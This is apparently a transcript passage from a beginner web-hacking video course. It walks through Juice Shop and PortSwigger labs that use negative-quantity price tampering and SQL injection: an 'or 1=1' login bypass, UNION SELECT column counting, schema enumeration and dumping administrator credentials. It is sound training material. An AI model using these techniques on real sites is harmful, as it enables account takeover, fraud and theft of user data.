ahead and add one in. We're going to make it a negative number so that we can subtract it later. We'll go ahead and forward that. Turn our intercept off. Come back to our jacket. Turn our intercept on. View the details. I did not want to view the details. I meant to, yes, view the details. We're going to add one to the cart. So that way we can buy our jacket, because that is our challenge. We'll go ahead and make sure that's negative. Forward, turn that off. And now we should have 2 negative items in our cart. It has to be above 0, but less than 100. So what we can do is we can just continue to subtract these. Oh, we'll add these. We'll go ahead and add these until we hit our price. Okay, it went back to 0 and removed it from our cart. So we'll go back over here, go back over here. Let's find something a little more expensive so we don't have to add that so many times. We'll go with the pool. Come to burp, turn our intercept on, and this is exactly how this would happen if you were testing it. It's just going to be a lot of trial and error. we're going to need, I'm going to guess, at least 15 of these. We'll just go ahead and add them to the cart. We don't need to intercept that. And go back to our cart, and there our total is now $76. So what we did is we just added 15 of these pools, which got us close to $1,500. And then $1,500. Then what we did is we went ahead and added our jacket in at a negative price because it wouldn't let us purchase anything at a negative number, and we only have $100 to spend. And so this should solve the challenge this time. So we'll go ahead and place our order. So I just wanted to add that you saw me make a lot of mistakes and a lot of trial and error in this video, and I want to thank you for being patient, but I also decided not to edit out all of the clicking that I had to do and the failures from this video, because I wanted you to see what it's realistically like as you test web applications, and as you're on the hunt, you will be doing what I just did the majority of your time, just trying to see if things work, and as they fail, you just go on and you try something new, and you try a different way to try and exploit the application or the vulnerability. And so I want to just encourage you that as you become frustrated or things aren't working, to just keep pushing on and see if you can find that vulnerability. And I will see you in the next video for your challenge. Okay, it is time for your challenge. So if you navigate over to Juice Shop and get it running, what I want you to do is try and solve the challenge to where you actually are being paid $200 or $300 or $400 or more from this application. We just worked through 2 labs that are similar to this, so you can go ahead and try and solve this challenge, and when it's done, you should get the green bar at the top of your screen that'll tell you that you have completed the challenge. So I want you to go ahead and pause this video and give that a try. Okay, how did that go? We're going to go ahead and walk through this in the same manner in which I would solve this. So go ahead and add something to your basket, and then we'll check our basket. And then at this point, what I would do is I'd go ahead and turn the intercept on and walk through the whole checkout process and see if there's anywhere that I am able to modify, and see if I can modify this in any way, shape, or form. And what I think I'm going to do is I don't actually want to walk through and have you watch me put all of that information in just to solve this challenge. So we'll go ahead and see if we can actually modify this before we get there. So it says we have basket ID of 5. We're buying product number 4. Let's see if it will let us do what we did in the previous challenge and put in a negative amount. Let's try 99, and then we'll turn the intercept off. It says we were able to add those to our basket, and they're going to pay us. That didn't work. Okay, they're going to pay us if we do that. So we'll go ahead and we'll try that again. $100 wasn't enough, so we'll come back to our products. We'll add to our basket. I forgot to turn burp on. We'll add this to our basket. We'll forward. Here's our quantity. I wonder if the rest of our content's at the end of this string. Well, we have our quantity, so what we'll do is we'll type in negative, and we'll do 200 this time. And we'll forward that and go to our basket, and that's more like it. We're going to get paid $400. So what you do at this point, I'm going to just walk through the checkout process. You would add an address, and then you would complete your order, and that should solve the challenge for you. So rather than having you watch me enter all of that information, that is how we would solve this challenge, and I will see you in the next video. Okay, we are going to begin working through some SQL injection. This is something that you can find. There are bug bounty hunters that dedicate their time only to looking for SQL injection. So if this is something that you find interesting, you can become really proficient at it, and this can be something that you primarily search for. I've actually found a few of these on some pretty prominent websites and web applications. So this is something I suggest learning and learning well. It's easy to look for. You don't really need to know a whole lot about SQL databases in order to find these, but it does help. In the bug bounty world, it's actually a lot easier than if you find these on a capture the flag, because all you have to do is put in a time delay to have a proof of concept. But in a capture the flag, you'll have to know a little more than what we're going to go over here. But for the sake of not going through and learning how to program in SQL databases, I think it would take just too much time. And so we're going to go through how to find these if you were to start looking on bug bounty programs. And I went ahead and opened up Nodus 15. You don't have to go through this or work through this. I'm only going through this to show you what it's going to look like, and then we're going to actually go over to Portswigger and we're going to work through their practice SQL injections. And so just to give you an idea of what we're doing, when you come to a login form, such as this one, whenever you come to something like this, one of the best things you should do and you should regularly check for is just to put in a single quote, and then you would hit enter and see what happens. And it says this user does not exist. What we're looking for is an error in the query. So I would go and I would do a double quote next, and I would hit check existence. And if you can hit an error, this is what we're looking for. And I'll actually show you in BERT, because this is where you're probably going to be sending your request through. So you'll hit check existence. You would send this to your repeater. And I'm actually just going to go ahead and change this so you can see it. And then you would hit send. And it says we get an error in query. What we're going to see here in a little bit is we're going to see this be a 501, an internal service network error. And that's usually what you'll see when you start finding these. But you will find what is called a blind SQL injection, and we're going to look at those a little bit later. So we still have the error. So what do we do with the error is we're going to start the enumeration process, but we're actually not going to do that here. I just wanted to show you kind of what we're looking for here so that you can look for it on your own in the first Portswigger lab and see what you can find if you can find it on your own. But just to give you a little more of an idea of what's going on in the background, the SQL database and the SQL language is going to look something like this. Select all from users. This will be where username equals, and this is what we input right here. So this would be our input. So what we did is we took this. This is what it'll look like. And this is what we can put in here. So you'd put your single quote or your double quote. And in the case of the Nodus web application, what it has is something like this. And then here's where you're putting your query, where you're putting in to see if the username exists. And so when we put in another double quote, what happens is you break the query, and this produces the error right here, because it doesn't need to be there. It shouldn't be there in order for this to work in programming. And so that's how you break it. One other thing I wanted to point out, just in case we don't come across this again, is sometimes you'll have a username and then you'll have a password down below. And if you put in something like test and it says this user does not exist, or it'll say invalid password or invalid username, that would be something that you could write up on a bug bounty program, because it would be information disclosure. If it says invalid password, then that means the username does exist. In the case of Nodus, I believe you're trying to find Nodus 16 password, so it says this user exists. So in this case, if there was a password and you got the password wrong but the username right, it would say this invalid password, and that would be something you could write up because the username does exist. Okay, what we're about to go over is going to be a little advanced, but I think it will help you visualize what's going on beyond more than what I just showed you in the last video. So what I have up is actually MySQL Workbench, and we have here just a simple database. This is a username I was testing. Here's an actual username and password. This is what a table will look like. And so in our query, we have select all from users, which is our schema, and then the table, which is users, that's not capitalized letter here. And so this is what a table looks like, and what's going to happen is this is running on a server, and when we send a query to the back end of a web application, it will reach out to the server and see if our query is true. And so this is what it will look like, the code will look like. I have been working on making a web app that I can put up for you guys to practice on, because really there's not a whole lot of places to practice our hacking skills. And so I've been working on putting together an application for you guys so that you have it available and you can practice what we're learning beyond just the sites that I've provided for you that other people have made. And so this is kind of what it looks like. We have our database and we're querying our database, and we are selecting all from the users table where the username equals, and then you can just pretend this is blank, because this is where our input is going to go in here. So we're selecting all users from the table where our input is at, and the password is equal to the other input. And so this makes sure that we have an actual username, and then it makes sure we have a password that matches our username and our password from our table. And so what this looks like is, over here we have our login page, and we have our login here, and if we type something in and we type in a password and we hit login, it's going to say wrong username / password. And so if we come in here and we actually have our actual login made, it'll say we are logged in. And so when we do a SQL injection, basically what we're doing is sending in a request that we decide what it's going to be to the database, to the back end of the website that reaches out to our database server. So this is a pretty simple SQL injection that we're going to be covering here, and we're going to be going into union select statements after this video, which I think are more common than what we're about to go over. And so it's very important to learn the union select SQL injection statements. There are some bug bounty hunters that dedicate all of their time only to SQL injection. So I just made this, I'm shooting this video because I really want you to understand what's going on, and it'll make more sense. Don't worry if it doesn't make sense right now. You may have to come back to this video more than once and go over the union select statements labs on your own, and then come back to them after a day or two and just continue practicing them until you really have them down. And so one of the things that we're looking for when we do a SQL injection is, I'm going to inspect this so you can actually see this happen. We're going to have our console up. Ignore my errors because my code is not perfect. When you put in a single quote, it will break this right here, and it will crash our server. So if we go ahead and throw that in, you see our connection is refused. And if you come over here, you can see our application has crashed, which means I need to restart it. And now our application's running. And so when you send that, you'll have an internal server error, which is what we essentially just got right here. And so how we get past this is by actually giving it a statement that is true, so that it will give us back the first login in the database. It'll give us back the first username and password. And so we're going to make a true statement right now. And so what we'll do is we'll just throw in, it doesn't really matter, and then our single quote, and then we'll have or 1 equals 1, and then we comment out everything after that. And then our password doesn't matter either, and it says we're logged in. But if we just have this right here, it doesn't really, it'll tell us that we're not logged in because this isn't correct. So if we have this in here, what we're saying is this username right? Is this a true username? And the answer is no. You see we have wrong username and password. But 1 equals 1 is always true. And then we comment everything out after this statement with this hash, so our password doesn't work. So you see how this is all in one line of code? This is all getting ran together. It's making this query all together, and what we're doing is essentially commenting out everything after our username, so the password doesn't even matter. So when I say we comment something out, we're commenting out everything after our statement. And so we throw this hash in here, and everything after it's commented out, the password doesn't matter. I think we can get by with no password because I don't have it set up right now that you have to have any characters in here, and it will come back as true. And this is what I'm talking about when we say sequence statement and we're querying a database or a server. Okay, there is one other thing I really want to show us. We're going to go over this again, exactly what I'm showing you right now, in another couple of videos, but I think it'll be helpful to see it. So one other thing is, whenever you give it the database a true statement, it's going to come back without an error or saying it's logged in. It's going to come back as true. So we just saw the statement that looked like this. We had our username, and then we had or 1 equals 1, and 1 equals 1 is always true, and so it comes back as logged in or it comes back as true. There are other things we can do to get information from a database. Let's say we had credit card numbers on this table. We had a credit card table, and you wanted to pull down the credit card numbers. Now obviously none of you are going to do that because you are not about to break the law or do anything illegal. Everything we're doing is for security purposes, to help businesses, right? Nothing bad. We would never pull down credit card numbers. Let's pull down a table of flowers or something. What we'll do is, let's see, we want these username and passwords, and we have an ID. So we have 3 columns here that have information in them. Let's say we know the table is users, and we want to know how many columns we have. What we'll do is to pull down something true. If we want to pull down the number of columns because we don't actually know how many there are, and we want to just find out some information from this database, you can actually come in here just like we did before, put in our random username that doesn't really matter, and then this is what I mean when I say a union select statement. So we're going to connect union to our statement here. So we have select all from users where username equals these things, and then we're going to add to it. We want to add a union select, if I can spell. We're going to select null, and this will tell us, is there one column in our table? And we send this, we're going to crash the server. I'll go ahead and send it so you can see we crash the server. I have to come over here, restart the server, and then I'm just going to give you, there's 3 columns. We know there are 3 columns. So we'll throw in null 2 more times, and this will say union select null null null, which is going to pull down how many columns there are. And if we send this, we got crash the server because we didn't comment out the rest of the string that we were querying. So here we go. We'll log in. Now we have no undefined came back, which means we have no errors. So we'd know there are 3 columns, And so this is going to come up in one of our very first SQL injections that we're going to be doing on the Portswigger web application. And there are labs that they have set up for us to practice on. And you feel free to continue practicing in there. But this is something we're going to be doing, and we're going to be going in a lot more detail. And you'll have to pay attention to this comment because it will change between two dashes without the semicolon based on the type of database that we're using. So I do apologize if this seems confusing. Hopefully it becomes more clear as we continue on. We're going to be covering SQL injection for quite a little while. We're going to be going through it in a pretty good amount of depth. And I know this is a beginner course, but this is a really common vulnerability. It's in the top 10 most common vulnerabilities. I think it's in the top 5 most common vulnerabilities. And like I said, there are bug bounty hunters out there that dedicate their time strictly to SQL injection, so it's worth learning. And I don't think it's too difficult. It's looking a little difficult right now because you've never seen it before. But by the end of this module in the course, if it's still unclear, you can go back and try it again and go back through this module, and it will become more clear, and you will memorize how to find these vulnerabilities. So with that, I will see you in the next video. Okay, we are here on portswigger.net. You can go ahead. I actually went ahead and logged in and created a new account. You can come in here and you can come up here, click sign in, and then create a new account. And then once you've done that, come back to the website and you will go to Academy. You can go ahead and click that and it'll load up, and then you'll go to all labs. And then this will take us to some of the labs we're going to be working through and the SQL injection. There's a whole bunch of them. We're not going to be going through all of them because some of them get kind of repetitive, and it has been a while since I have done these, at least a year. And so I actually thought what would be good, I'm not going to rehash any of these before we go through them, so you are going to see me make mistakes and you'll get to see my thought process, and you'll kind of just get to see how I work through these. And so if you want, you can go ahead and open up the first one. And then I like to open it up in a second tab over here. And they'll give you some instructions and kind of tell you what you're looking for here. And they'll actually tell you where to find some of the SQL injections so you don't have to spend your time clicking through the whole web application and trying to figure out where things are. And so they kind of point you in the right direction. And so we're looking for a SQL injection with the union attack. And so what this looks like, let's open this back up, is when you find, so this is what their side of the query looks like. And then we would be typing in, you would close it off. In our case, it's going to be a single quote, union select, and then we're going to be looking for the number of columns and what we can find within this vulnerability. So we come over here and it says find the number of columns returned by the query. And there's a couple of ways to do this. I think I'll show you both. I think they both work in this program, and you can decide what works best for you. So you can come in here and I actually want to first give you a chance. I'll show you kind of what we're looking for, and then I'll send you, I might have passed it, on your way, and see if you can find it on your own. So you can come in here, send one of these to your repeater, and see if you can find the SQL injection without any help. And it's okay if you haven't. We really haven't covered this a whole lot, but in the coming videos, we'll be able to do this multiple times over and over, and so you'll get the hang of what we're going through and what we're looking for. Okay, I'm going to send this to the repeater. I'm not actually sure where the SQL injection is even at. I think we'll try right here. Okay, that's what we're looking for. It is going to be right here. And so we're looking for this right here. This is what I was talking about in the last video, the internal server error. If you can produce this error, what you should immediately be thinking is there's going to be a SQL injection here somewhere. It is here somewhere. You just have to figure out how to exploit it. And so what the challenge actually tells us to do is we're looking for the number of columns returned. And so we're trying to figure out how many columns are on the specific table. And so if you think of an Excel spreadsheet, you have rows and then you have columns. And what we're trying to do is figure out how many columns exist on the table. And when you're doing a SQL injection, we're going to be looking for passwords as we go through the Portswigger program, but there are a lot of other things you can look for, and we're going to get to those and exactly how to find them. Even though you're never really going to pull down actual information on a bug bounty program, I wanted to walk through, as someone who doesn't know how to program in SQL, what to do if you come across a capture the flag and you're trying to find specific things such as usernames or flags or passwords. And so we'll get to that in the coming videos, but now we have produced this internal server error, and so we know we are looking for the number of columns using the union attack. So we have our single quote, which breaks the query, and then we type in union, and because we are sending this request, we have to send a plus for the space. If you don't have the plus in there, and you actually put a space in, it will break what we're trying to send. So union, select, and then you put in here null, which is just nothing, and then you send it, and it comes back with nothing, and then you just hit comma, and then you put in null, and you'd send it, and it still sends us an error. So we put in null again and we send it. And oh, what we forgot to do was you have to close out the rest of the query. So in here we have to put a dash dash, so that comments out everything after our statement here. So whoops, we are actually able to comment out everything after. So we'd send this, and then we'd come over here and we'd put in null again. And it still says we haven't found the number of columns. And so it hit on the number 3, it came back, okay, so this statement would be true. So when the statement is true, it'll send us back a response. And so we have our response, which means there are 1, 2, 3 columns inside this lab we're working on. And so with that, I will see you in the next video, because as soon as we go ahead and send this, it should say we have solved this lab. And so as we come into the next one, we'll read the instructions and we'll work through it, but I want you to go ahead and open up this second lab and see if you can pull down the number of columns in it, and then we'll pull down which columns contain text. So I'll see you in the next video. Okay, what I would like for you to do is go ahead and open up the second lab and click access to the lab, and I want you to go in here and do exactly what we did last time and see if you can remember how to find the number of columns in a SQL table. So you can go ahead, You can open that up, see if you can find it, and then if you want to try and figure out how to find the columns containing text, you can Google around and see if you can figure it out. If not, we're going to work through it now, and you will have the opportunity to practice finding columns containing text, as well as continuing to find the number of columns in a table in the future. So this isn't your only chance to try and practice this on your own. In fact, I would encourage you, as soon as we finish SQL injection, to go back through some of these labs and see if you can solve them by yourself, and then maybe once the course is over, come back and try them again, just to ingrain this process into your mind, because this is going to be something I highly recommend you look for when you start your bug bounty or web application pen testing career. And so go ahead and give that a try now, and then we'll go ahead and work through it together. Okay, if you were able to pull down the number of columns, then you have figured out or learned what we went through in the last lesson. But if not, we're going to go ahead and work through this one again. So we'll come in here, we'll just click on one of these tabs, and we'll have a request sent, a get request, and then we will take it and go ahead and send it to repeater and see if we can find an internal server error. Might not actually be in this one. Let's see. There it is. It's in this one. So we'll send this to repeater and put in our single quote, and there is the error. So this is where our injection is going to be. And so if you weren't able to find it, you can go ahead and from here and see if you can solve the challenge and pull down the number of columns in this lab. So you can go ahead and give that a try now. Okay, what we do here, if you remember, is we type in union and our plus, then we select, and then we have our plus, and then we type in our first null value for the column, and then we comment everything else out after the request is sent. And it says we still have an error, and so we try this in. You actually don't have to have these in all caps. It's just kind of common practice for what people usually do, is have things in all caps. I'm not really even sure why, so if you know why, if you're a programmer and you know why, you can go ahead and let me know. I actually do programming, and I actually build websites and web applications and tools for pen testing, but I still don't know. And so if you know, you can go ahead and let me know why some things are in caps when they don't have to be. So we pulled this down, and we found 1, 2, 3 columns. And so if you made it this far, good job, congratulations. You have learned how to pull down the number of columns, but now we're supposed to pull down which column has text or which ones take text. And so you would put in your single quotes, and then you put in a string and then send it. And that one came back as an error, so we'll try the next column, and it is the second column contains text, and we'll go ahead and try the final column as well. Whoops. Okay, so it would be the center column is the one we would go after to try and pull down information, which is not actually available in this lab, but it is going to be available in the coming labs. So in the next lab, I want you to try and go through this, find the category of where you're going to find your error, and then try and pull down union, select the number of columns, which column contains text, and then we'll work through how to actually pull down the information from that column. All right, I did not notice after I had closed the video that the lab still said it was unsolved. And for those of you that is bothered when a lab goes unsolved or you want to see them all solved, I'm going to go ahead and do that now because I know if I were you, that would bother me, saying that someone had completed the task yet it didn't complete the task. What happened was the lab wants us to input something that we receive back in the response. So we'll go ahead and I'll show you where to find that. If you want, you can go ahead and try and find it. I actually think this is a good challenge. I think you'll be able to find it. Just go ahead and go into the lab and go ahead and perform the SQL injection. Find the one that contains the accepts a string, and then look through the response and read through it and see if you can find the answer to solve the challenge. If not, we're going to go ahead and do that now. So we come in here and we perform the union select SQL injection the way we always do. And this is my problem. Okay, what you have to do in order to solve the challenge is when you look through here, it says make the database retrieve the string. And so we copy this and we inject it as our string. And I actually think, yeah, it goes in the center one. This here solves the challenge for you. And so now the challenge is solved, and I will see you in the next lesson. Okay, we are back with the third SQL injection challenge. You can go ahead and click on it and read through the prompt. I'm actually going to give you the challenge to see if you can pull down which column or columns contain characters and will accept a string. And then I'm going to walk you through pulling down data from the table. And then I would suggest practicing. So after we go through it on this lab, to try and go through it again without the video before you move on to the next lesson, so that you can continue practicing things as you see it happening. So we'll go ahead and enter into the lab, and it's going to be pretty much the same. So if you want to go ahead now, I'm going to wait a few seconds and you can pause the video and see if you can complete the challenge and pull down which column or columns contain a string before we go ahead and continue learning how to enumerate the table columns. So by now this should be pretty familiar to you. We're going to come in here, we're going to look for our request that I apparently passed. We'll send this to repeater. We'll make sure that we get our internal server error, and then we'll try our union select attack. And send it and see how many columns we pull down. So there's only 2 in this lab. And so what we'll do now is we're going to pull down information from the table. So I'm going to show you how to do that, then I'm going to give an explanation of the best way. If you don't know any SQL or you don't know how to write any SQL statements, how to find table names if you find this in a capture the flag and you don't want to go through the long process of trying to figure out the table names through writing SQL statements. But before we get there, I'm going to show you, this is what we'll do. We have two columns. You'll see, check to see if they'll accept a string, and that one does. I'm going to go ahead and leave it. And that one does as well. That means there's both these columns have information within them. And let's say there was a third column. When we if we were to write our SQL statement, we would have to include all three columns because the query has to be considered true. You would just leave the null statement in here. So it would look something like this. You would leave the null, let's say it was at the beginning. Let me actually just delete all this and write the statement out. And we're going to see some of these in the coming videos, and just to give you an idea that you can go ahead and try and do these. You would do null plus the username. See, this is what you have to do. You'd leave this as an empty column, but in our case we don't have three columns, so we're going to just go with the ones that we do have and the ones that will accept a string. And so we're going to pull down usernames, and then we're also going to look for the passwords in the table. So we look for the password, and it's from the users. And this should pull down for us the username and the password from the users table. And then we'll look through the response and see, this looks like a user, this looks like a password, this looks like a user, this looks like a password, and this would be the administrator, this would be his password. So in our response, we have pulled down the usernames and the passwords that are within the table. And this would give us access, if we wanted to, you could log in as these people. If this was a real website, you would have access to their accounts. And this is why SQL statements are very dangerous, and this is why in the bug bounty world you actually get a pretty good payment from finding SQL injections. And not only can you pull down usernames, but there are other databases that you can find, such as usernames, names on credit cards, or credit card numbers, which makes them very dangerous. Since we have pulled down the usernames and passwords, you can go ahead and turn your proxy off so that the web page loads, and then you will have the usernames here and the passwords, and you can come over to log in and you can give them a try and see if you're able to log in and see if this solves the challenge. That one didn't solve it. Let's go ahead and try let's try the administrator. There, that one solved the challenge for us. So with that, I want you to go ahead and see if you can figure out the next challenge without any help. See how far you can get and if you can make it through. So I'll see you in the next video. Okay, we are back again. We are going to skip over this fourth lesson and we're going to jump into the fifth lesson. And you can go ahead and open this up and read through it. This time we're going to be in an Oracle database, and so we're going to be trying to pull down the version that it is running. And so with this tip, we can see there's a built-in table called dual. So they actually give us the table name this time for us to run through. And I think with what you've learned so far in the SQL injection cheat sheet, you should be able to figure out how to solve this challenge. So if you want to go ahead and pause the video now and try, you can go ahead and do that. If not, we're going to walk through the solution together. So we'll open up the page. We'll go ahead and turn our proxy on. And this should all be familiar to you by now. So we're sending that to repeater. We make sure that we get our internal server error, and then we move on just like we have before. So we type in union, select, and then we'll check for a single column. But if you remember, the table name we were told is called dual. And so we can send that, and we still have an error, so let's try for a second column. And we see that there are two columns and the table name of dual. So we'll come in here and make sure they can receive a string, and they can. Looking through the response we got, and so what we'll do now is we're looking for, if you remember, the version name. We're trying to pull down the version name inside the response. So we'll come back to burp, and since these can receive string, we type in here banner, and then if you remember from the previous lesson, if we have multiple columns that can receive a string and we're not actually going to use one, we have to leave it with null, so that way that column receives an input. We just don't want anything from it yet at this point. And then for Oracle, the way you pull down a version is $, and then just the word version. And we'll see if that sends it for us. I saw this change in the background to solved. So that gets us our information that we need. And so we should be able to scroll through here, and we find it right in here. All right, I will see you in the next lesson. Okay, in this lesson we're going to go ahead and open up this one, the MySQL and Microsoft. I will just go ahead and tell you they are trying to pull a quick one on us, because instead of using the typical dash right here that we use in Microsoft to close out or to cancel or to comment out everything after your query, you will use a hashtag, and that will stump me. I will come across that, and I can sometimes not figure out what's going on, and I can spend a significant amount of time trying to figure it out, and in the end I was using the wrong comment. And so that's one thing to be aware of. And in this lab we're going to inject an attack, and we're going to pull down the type and version of MySQL that's being used. And so this is very, very similar to the last one. And when you go ahead and open up the lab, we are looking to make the database retrieve the string. So I'm actually not entirely sure how to get this to say solved. So we're going to be figuring this out together for, I guess, the first time. So I'm guessing what we're supposed to do is use our union select attack, pull down the um, response that we get right here, and try and find the version, which will look something like this, that it's using, and then go back and put it into a string, and it should give us the solved problem solved up here. So if you would like to go ahead and give this a try on your own, you can go ahead and do that, and I'll give you a few seconds and you can pause the video and then we'll walk through it together. Okay, we're going to continue the same way we have been. Turn on the proxy, pick a category, send it to repeater, turn the proxy off. I'm going to lower this so when it comes through as solved we can see it. We'll see if we get our error, and we do. And so we'll come in and we'll try our union select, and then we go try for null, and then don't forget the way we comment out is with the hash or the pound symbol. It has more than one column and it has two columns. So what we will do is we will make sure they can both receive a string, and they do. And so the way we pull down the version in Microsoft MySQL is a little different than the way we did it with the Oracle one. We'll go with the two @symbols. You type in version, and if you looked through the cheat sheet, you would know this is how you pull down the version for Microsoft. And so what we do is we type in null, because you have to have both columns filled. And then we'll send it, and we came back with a positive response. And so we'll look and see if we can, oh, it solved it for us. It already said solved. I thought we were going to have to find a version number and send it through as a string right here, like this. So if our version number, I forget what it was, something like this. But we didn't actually have to send our version number through in a string to the database. So it gave us the solved just by going like this. And there's our version number. So I thought the way we were going to solve this was send it to the database in a string like that. But it was not the solution. So I will see you in the next video. Okay, at this point, things are going to become progressively more difficult in pulling down usernames and passwords, especially once we get to the blind SQL injection, because this is something that we have not seen before. So we're going to be preparing for that by going into this lab right here. You can go ahead and open it up, and we are going to be pulling down the username and passwords, and we're going to log in as the administrator to solve this challenge. I think you can go ahead if you want and practice pulling down how many columns there are and which ones actually receive a string, and you can go ahead and pause and do that if you would like. If not, we're going to go ahead and solve it together. So we'll turn on the interceptor, and we're going to be seeing some new information that we haven't seen before, and it's going to seem strange, but I'm going to do my best to explain exactly how the SQL statements work, the default tables, and what we're looking for. So we'll go ahead and send that to repeater, turn that off. We'll send that, make sure we get our error, determine how many columns there are, and which ones receive a string. Sorry, can't think and type. So we have 2, and we'll check to see if both of them receive a string, and they do. So at this point, things are going to be a little bit different than what we've been doing. We're actually going to be trying to pull down some information from these tables. And so what we do, the first thing we have to do is figure out the table name. So if we have a grid like an Excel sheet, you have your columns that are going up and down, your rows that are going across, and the name of the table. The first thing we have to know is the table name in order to request the columns and then individual cells within the table for us to pull down that contain the usernames and the passwords. So we have our union select, and then we come in and we type in table name. And so this is what we're looking for. If you remember, we're replacing one of the null values with the table name. Then we leave the second one with the null value because we're not going to be pulling anything from it just yet. And then we go from the information schema. And this right here, the information schema dot tables, and this is a default table that you're going to have on every SQL database. So that's how I know this is there. If you were to go into SQL and you were to open it up, you're going to have several default tables, the information schema tables. This is default, it's always going to be there. And so this is how we know what to put in for our injection. Then we send it, and we have an error, which means I'm guessing I have a typo somewhere in our statement. Let's see. Union select the table name. Right here it is. Information schema. There was my typo. And we pull down and we'll look through our response and pull down the table names that we have here, and there are a bunch of table names. But if you remember, the one we're looking for, we're trying to log in as the administrator, so we're going to need the users table. And so we can just go ahead and see right here, users. This is the name of the users table. I would suggest copying it and having a text file open because we're going to need this information in the very near future. So we have that open there. So now we're going to look for the column name. So we can delete this. So the table column is what we're looking for now. So we're going to, actually, I deleted the wrong part of the request. Instead of the table, we're looking for the column name. And we're going to leave this in the information schema dot columns. And this looks right. And now we're going to add to this because now we're looking for the columns from a very specific table. So now we add a plus and we'll say where the table name equals and then our users table that we just pulled down. So we'll type in table name and then we do equals and then our double quotes. I think I've actually already got that copied still. And then we paste in our users table. So what we have going on is our union select. So everything that's coming before this doesn't really matter. We're adding a query onto it. We're looking for the column name. We have our second value retrieving null because we're not looking for anything from it just yet, from the information schema, which is one of the defaults within the SQL database. And we found the table, so now we're looking for columns where the table name, so we're pulling down the table name, equals users. This is going to give us the columns within the table that is named users with some random characters. And so we should be able to send this, and I'm very happy to report there were no typos. I was a little nervous. You guys were going to have to continue watching me pull through, read through this and try and figure out where my typos are at. So now we should be able to scroll down, and we have column names. So the passwords column and the users column. And so now we should be able to change our query and pull down the passwords and the username. So I'm going to go ahead and copy these. We have the username and the password columns. These are the ones that we are interested in. And now we're going to change our union statement. So now, instead of pulling down a column name, we are going to be looking for the username and the password. So we can delete our null and we can insert the password column, and here we'll put in the username column in the first slot instead of the column name. And we're looking for the username, the password, and it's coming from our table. From our users table. I don't believe we need those little quotes anymore. We'll send that and see what comes back. We still have an error. So what are we missing? The union select, username, the password. We don't need the where. From, oops, I went too far. From users. Let's see if that works for us, and it does. So we should be able to come through now to solve the challenge. We have the administrator and another user, so we can copy the administrator. We can come back to our lab. Remember, to solve it, we have to log in as the administrator. We can paste in the administrator, and then we can come back to burp and copy our password. And this should solve the challenge for us. Okay, now that was very, I don't want to say complicated, but it was a big jump from where we have been coming and where we've been coming from. And so as we get ready to go into blind SQL injections, it's going to become even more complicated. So you might have to go through this lab several times and make sure that you really understand what's happening. Make sure that everything that's built up to this point is working together. The next lab, I believe, is an Oracle lab. Okay, so you can try and solve this one. It's going to be similar to the one that we just did, only you can use the SQL cheat sheet. We'll go ahead and walk through it again just so we can have one more practice before we get into the blind SQL injections, because these are going to use everything we just learned in this lesson plus quite a bit more. We're going to be looking at new aspects within burp and exactly how to use the intruder tool within the burp program. So I think it's very important at this point, if I can stress it enough, we're going to have quite a bit of practice going into the blind SQL injection, but it's a lot more difficult than what we just went through if you've never done this before. So go through this again if you have to. Make sure you understand what's happening and what's going on, and I'll see you in the next lesson. Okay, what I want you to do in this lesson is I want you to try and solve this lab completely on your own. I'm going to give you 2 clues before you start, but other than that, you have already learned everything necessary for solving this challenge. So we'll go ahead and open up the lab, and if you remember, when we do go through an Oracle database, you have to use from dual when you're trying to pull down the number of columns within the table. And so since we're looking for we're going to have to log in as the administrator. That should give you a clue to at least how many columns are going to be within the table. And so the other clue I wanted to give you is if you go ahead and open up the SQL injection cheat sheet, when you pull this open, you are going to be using from all tables instead of information schema. So in the last lesson, we used information schema as our default. Well, that's not what we're going to be using this time. This time we're going to use all tables. So everything should be the same as it was last time. The only difference is we're going to be using all tables instead of information schema. And so you can go ahead with that information and try and solve this lab. And if you have gotten stuck, we're going to go ahead and walk through this together now. So the first thing is turn your interceptor on. We're going to go through the normal procedures here. We're going to send it to repeater, turn the intercept off, and make sure that we have our error appear, which we do. So this is telling us we have a SQL injection. We are going to pull down the number of columns. I know there's at least 2 because we were told that we have to log in as the administrator, which means there's at least a username and passwords column. So we have at least 2 of those. And then we pull down, we have to add our from dual. And then we'll go ahead and send this, and it comes back. So there are 2 columns. Both of these are going to have to retrieve a string in order for us to pull down a username and password. So I'll go ahead and check it anyway, but I know it's going to come through, and it does. Now this is where we are going to start practicing what we learned in the previous video. So if you remember, the first thing we have to do is find the table name. So we can go ahead and type in our table name. And this is from. Last time we used information schema, but if you remember this time, we're going to use all tables. And we have a typo somewhere. Oh, remember we had 2 columns. I deleted the null value that we had. And there we go. So this should give us all tables. If you remember last time, there was a bunch of them, but we are looking for the users table. I'm guessing this is the one that we need. User history. We're going to go ahead and pull down the information. Well, this is, we'll grab a couple of them just in case, but I think that's going to be the right one. So we'll keep this one. This is the one we're going to roll with. Now what we'll do is we'll have to come back up here, if you remember, and change. Now that we have the table name, we're going to go ahead and insert this and see if we can find the column name. So we'll change this to column, and we'll leave our null, and it is from, and this time we're going to put in our table into our injection. So we have from all. So we have from all of our tables, and we're looking for, at this point, the columns where it is equal, the table is equal to the column or the table name that we just pulled down. So we have where, and then we'll type in our table name, and then equals our table name. And we'll go ahead, look this over, and then we'll send it. And it came through. Now we have to hope that we have our columns. So we have a password column pulled down, and we have the username. Go ahead and put the username up here. Okay, now we have to change our injection one more time. So this time we'll be getting rid of our null value, and we're going to be putting in first our username, and then we're also looking for the passwords, which will come from our second column, and this is going to come from our table name, which I actually think we delete this. We'll delete that, and we'll delete this. And we have an error, comma, and we have pulled it down. So this should have our usernames and our passwords in it, just like the last one that we walked through. Here's the administrator and the password. And so if you remember, we have to log in to actually receive the solved lab up here. So we'll go ahead, paste that, and we'll copy and paste this and send it, and we have solved the challenge. I would again encourage you to make sure that this is making sense, because we're about to build on what we have learned so far, and it is about to become a little more complicated. We're going to be learning more advanced tools, and so just be prepared. Go get yourself a coffee and come back ready and focused, and I'll see you in the next lesson. Okay, we are back, and we are ready to start the blind SQL injection. We are going to go ahead and open up this lab, but while it's loading, I thought I would just tell you this is going to be, the next couple of labs are going to be a little more difficult, and I think that you should practice them just to get this ingrained into your mind, what exactly is happening, because we're going to be adding quite a few new steps, but they actually let us skip what we have been practicing, because in the instructions they give us that we are going to be working with a table called users and two columns, usernames, or the username and passwords. So we don't have to go find the table, and we don't have to find the columns, but we do have to still log in as the administrator to complete this lab. So you can go ahead and open up this lab, and this is actually the second time that I'm shooting this video, because the first time I came in to start this lab exactly how we normally would, by opening up one of these tabs, forwarding it, and then sending our request to the repeater, putting in our single quote,
